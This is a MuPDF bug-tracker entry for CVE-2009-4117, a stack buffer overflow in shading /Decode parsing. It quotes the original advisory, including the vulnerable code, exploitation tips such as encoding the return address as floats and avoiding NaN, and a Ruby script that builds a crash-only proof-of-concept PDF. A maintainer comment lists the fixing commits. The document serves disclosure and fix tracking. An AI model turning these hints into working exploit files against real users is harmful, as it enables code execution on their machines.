Bug 708030 - CVE-2009-4117: MuPDF pdf_shade4.c multiple stack-based buffer overflows
Summary: CVE-2009-4117: MuPDF pdf_shade4.c multiple stack-based buffer overflows
Status: RESOLVED FIXED
Alias: None
Product: MuPDF
Classification: Unclassified
Component: Security (public) (show other bugs)
Version: unspecified
Hardware: PC Windows 7
: P2 normal
Assignee: MuPDF bugs
URL:
Keywords:
Depends on:
Blocks:
 
Reported: 2024-09-13 15:08 UTC by Sebastian Rasmussen
Modified: 2024-09-13 15:08 UTC (History)
0 users

See Also:
Customer:
Word Size: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Sebastian Rasmussen 2024-09-13 15:08:01 UTC
This is a bug report created after the fact to contain the information about
CVE-2009-4117 concerning MuPDF 0.5. The CVE report was archived here:
https://www.exploit-db.com/exploits/10244

The report is also quoted here in full:

"MuPDF is a lightweight PDF viewer and toolkit written in portable C".
It is used in particular by SumatraPDF which is a small open-source
PDF viewer for Windows.

MuPDF before commit 20091125231942 did not properly handle /Decode
arrays in a shading of type 4 to 7, leading to a stack-based buffer
overflow. Version 1.0.1 of SumatraPDF integrates this correction and
is no longer vulnerable -- it is recommended to upgrade to this version.
In addition, SumatraPDF 1.1 will have DEP enabled permanently on XP/
Vista/7 (through NtSetInformationProcess), as well as being marked
ASLR-compatible.


   Timeline
   ========

2009-11-23  MuPDF and SumatraPDF contacted
2009-11-25  fix integrated
2009-11-28  SumatraPDF 1.0.1 released


   Details
   =======

The vulnerable code is shown below:

   float c0[FZ_MAXCOLORS];
   float c1[FZ_MAXCOLORS];
...
   obj = fz_dictgets(shading, "Decode");
   if (fz_isarray(obj))
   {
...
       for (i=0; i < fz_arraylen(obj) / 2; ++i) {
           c0[i] = fz_toreal(fz_arrayget(obj, i*2+4));
           c1[i] = fz_toreal(fz_arrayget(obj, i*2+5));
       }
   }

Although SumatraPDF is compiled with /GS, for some reason Visual Studio
2008 failed to flag the vulnerable function. Thus, exploitation is not
particularly difficult, although there are a few tricks:

  * Care must be taken not to overwrite the obj pointer on the stack,
    as it would lead to a crash. Fortunately, the i variable is
    overwritten first, so one can simply increment it to skip obj.

  * The overwritten array handles a bunch of floating point values.
    So all hexadecimal values (such as the overwritten eip) must be
    converted into a floting point value, but not using scientific
    notation because the MuPDf parser cannot handle it.
    For example, 0x33 will be encoded as
    0.000000000000000000000000000000000000000000071

  * All 32-bit chunks of the shellcode need to have a valid floating
    point counterpart: no value must correspond to an IEEE 754 "NaN"
    (not a number). In practice, this can be easily achieved by
    inserting NOPs.

The origami PDF framework (see http://www.security-labs.org/origami/)
may be used to test this vulnerability. The following ruby script creates
a PDF with an oversized /Decode array:

# MuPDF pdf_loadtype4shade() PoC code (crash only)
# authors: Christophe Devine and Guillaume Delugré

$: << "sources/parser"
require 'parser.rb'
include Origami

sploit = [ 1234 ] * 250

shader = Graphics::Pattern::Shading::FreeFormTriangleMesh.new
shader.ColorSpace = Graphics::Color::Space::DEVICE_RGB
shader.BitsPerCoordinate = 24
shader.BitsPerComponent = 16
shader.BitsPerFlag = 8
shader.Decode = sploit

page = Page.new.add_shading(:kikoo, shader)
page.Contents = ContentStream.new
page.Contents.paint_shading(:kikoo)
PDF.new.append_page(page).saveas('toto.pdf')


How to modify this script to successfully exploit the vulnerability
is left as an exercise for the reader ;) Metasploit 3.3 was
used for the creation of the shellcode. This poc will not work with
other versions of SumatraPDF as it uses a jmp esp in the binary.
Comment 1 Sebastian Rasmussen 2024-09-13 15:08:36 UTC
This was fixed back in 2009 by:

commit a21cc1548993c392e474817bb3d656eb3730d88f
Author: Sebastian Rasmussen <sebras@hotmail.com>
Date:   Wed Nov 25 22:58:00 2009 +0100

    Limit number of components in Separation/DeviceN colorspace to FZ_MAXCOLORS.


And further improved by:

commit cf6860c3d70a2f7a63cdb621cc3b58c891915deb
Author: Sebastian Rasmussen <sebras@hotmail.com>
Date:   Thu Nov 26 00:19:42 2009 +0100

    Factor out color decode parsing to common function for shadings type 4-7.